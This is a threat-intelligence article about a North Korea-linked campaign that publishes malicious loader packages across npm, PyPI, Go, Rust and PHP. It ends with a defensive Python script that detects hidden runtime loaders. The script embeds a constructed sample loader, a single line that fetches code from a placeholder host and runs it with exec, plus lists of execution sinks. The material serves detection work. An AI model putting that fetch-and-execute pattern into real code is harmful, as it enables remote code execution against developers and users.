Threat Intelligence

Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust

Cyber RT | April 9, 2026 | 3 min read

The North Korea-linked campaign "Contagious Interview" has expanded beyond npm and PyPI into the Go, Rust, and PHP ecosystems, spreading malware through packages that impersonate legitimate developer tools. The packages act as loaders that fetch second-stage infostealer and remote access trojan (RAT) payloads. The activity, linked to the financially motivated actor UNC1069, pairs these packages with social engineering to get into developer environments for espionage and financial gain. Socket has identified over 1,700 malicious packages tied to the campaign since January 2025, underlining a persistent software supply chain threat.

The North Korea-linked cyber campaign known as Contagious Interview has extended its reach into additional programming ecosystems, including Go, Rust, and PHP. According to a report by Socket security researcher Kirill Boychenko, the threat actors publish packages that mimic legitimate developer tools but secretly function as malware loaders. Socket describes this as a coordinated cross-ecosystem supply chain attack: the identified packages span npm, PyPI, and the Go, Rust, and PHP (Packagist) ecosystems.

The packages are designed to download platform-specific second-stage payloads with infostealer and remote access trojan (RAT) capabilities. Their primary aim is to harvest sensitive data from web browsers, password managers, and cryptocurrency wallets, which makes developers and their workstations the direct target.

The Windows version, delivered via the "license-utils-kit" package, is particularly concerning. It carries a "full post-compromise implant" that can execute shell commands, log keystrokes, steal browser data, deploy AnyDesk for remote access, create encrypted archives, and download additional modules, which shows the depth of functionality built into the campaign.

The malicious code is concealed so that it does not run at installation time. Instead it is embedded in functions that appear legitimate; in the "logtrace" package, for example, the loader sits inside a method that matches the package's stated purpose, so a developer reading the code is unlikely to become suspicious. A practical consequence is that auditing or blocking install-time hooks alone is not enough, because the payload is only fetched when the host function is called at runtime.

Contagious Interview's expansion across multiple open-source ecosystems demonstrates the campaign's sophisticated and persistent nature. It is engineered to use package registries as initial access points into developer environments, aiming for espionage and financial gain. Since January 2025, Socket has identified over 1,700 malicious packages linked to this activity, underscoring the scale of the threat. The campaign is part of a broader pattern of software supply chain compromise by North Korean hacking groups, including the poisoning of the popular Axios npm package.

The activity has been linked to a financially motivated threat actor tracked as UNC1069, which overlaps with groups such as BlueNoroff and Stardust Chollima. Security Alliance (SEAL) reported blocking numerous UNC1069 domains that impersonated services such as Microsoft Teams and Zoom for social engineering. UNC1069 employs long-term, low-pressure social engineering across Telegram, LinkedIn, and Slack, impersonating known contacts or credible brands to deliver fraudulent meeting links that lead to malware execution. These fake links initiate data theft and post-exploitation activity across several operating systems, and operators often leave implants dormant to maximize the value extracted before detection.

Microsoft has acknowledged the evolving tactics of these financially driven North Korean threat actors. They continue to adapt their tools and infrastructure, using domains that mimic U.S.-based financial institutions and video conferencing applications for social engineering. Despite the changes in tactics, the continuity in behavior and intent is clear, and it poses an ongoing challenge to defenders.
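The report's key detection point is that the loader does not fire from an install hook but from an ordinary-looking function that is only invoked at runtime. The following static triage script is an added example for this article, not code from the Socket report or from any package named above. It parses a Python module and flags every function that both fetches data over the network and passes it to a dynamic-execution sink, the shape of loader described for "logtrace"; a host-platform probe in the same function is recorded as an extra indicator because the campaign serves platform-specific second stages. The two embedded modules are constructed samples, the indicator lists are short and deliberately hypothetical, and `example.invalid` is a placeholder that never resolves.

```python
"""Static triage for a loader hidden inside a legitimate-looking function.

Added example; not code from the Socket report or from any real package.
Walks a Python module's AST and reports functions that combine a network
fetch with a dynamic-execution sink, which is the runtime-loader pattern
the article describes (nothing runs at install time).
"""
import ast

# Hypothetical, intentionally short indicator lists; extend for real use.
NETWORK_FUNCS = {"urlopen", "urlretrieve"}            # urllib.request.* or bare names
NETWORK_MODULES = {"requests", "httpx"}               # requests.get(...), httpx.post(...)
EXEC_NAMES = {"exec", "eval"}                         # bare builtins
EXEC_ATTRS = {("os", "system"), ("subprocess", "run"), ("subprocess", "Popen"),
              ("subprocess", "call"), ("subprocess", "check_output")}
PLATFORM_ATTRS = {("sys", "platform"), ("os", "name"),
                  ("platform", "system"), ("platform", "machine")}


def _qualname(node):
    """(base, attr) for `base.attr`, (None, name) for a bare name, else None.
    For `urllib.request.urlopen` the base is the last prefix segment, `request`."""
    if isinstance(node, ast.Attribute):
        v = node.value
        base = v.id if isinstance(v, ast.Name) else v.attr if isinstance(v, ast.Attribute) else None
        return (base, node.attr)
    if isinstance(node, ast.Name):
        return (None, node.id)
    return None


def _classify_call(call):
    """Map one ast.Call to 'network_fetch', 'dynamic_exec', or None."""
    q = _qualname(call.func)
    if q is None:
        return None
    base, name = q
    if name in NETWORK_FUNCS or base in NETWORK_MODULES:
        return "network_fetch"
    if (base is None and name in EXEC_NAMES) or (base, name) in EXEC_ATTRS:
        return "dynamic_exec"
    return None


def scan_module(source, filename="<module>"):
    """Return [(function_name, lineno, sorted_indicators)] for suspicious functions.

    A function is reported only when it both fetches and executes; a platform
    probe on its own is normal code and never produces a finding by itself.
    """
    tree = ast.parse(source, filename)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        indicators = set()
        for sub in ast.walk(node):
            if isinstance(sub, ast.Call):
                tag = _classify_call(sub)
                if tag:
                    indicators.add(tag)
            elif isinstance(sub, ast.Attribute) and _qualname(sub) in PLATFORM_ATTRS:
                indicators.add("platform_probe")
        if {"network_fetch", "dynamic_exec"} <= indicators:
            findings.append((node.name, node.lineno, sorted(indicators)))
    return findings


# Constructed samples for a stand-alone run; neither is real package code.
BENIGN_SAMPLE = '''
import logging, time

def trace(msg, level=logging.INFO):
    logging.log(level, "%s %s", time.strftime("%H:%M:%S"), msg)
'''

SUSPICIOUS_SAMPLE = '''
import logging, sys, urllib.request

def trace(msg):
    logging.info(msg)
    stage = "win" if sys.platform == "win32" else "nix"
    exec(urllib.request.urlopen("https://example.invalid/" + stage).read())
'''

if __name__ == "__main__":
    import sys
    for label, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(label, scan_module(src))
    for path in sys.argv[1:]:  # optional: scan real files, e.g. from site-packages
        with open(path, encoding="utf-8", errors="replace") as fh:
            print(path, scan_module(fh.read(), path))
```

Run it with no arguments to see the two samples classified, or pass paths from a fresh virtualenv's site-packages to triage what an install just pulled in. The heuristic only sees literal names: a loader that builds its call through `getattr`, `importlib`, or a base64-decoded string will slip past, so treat a clean result as "nothing obvious" rather than "safe", and pair it with a sandboxed import that watches for outbound connections.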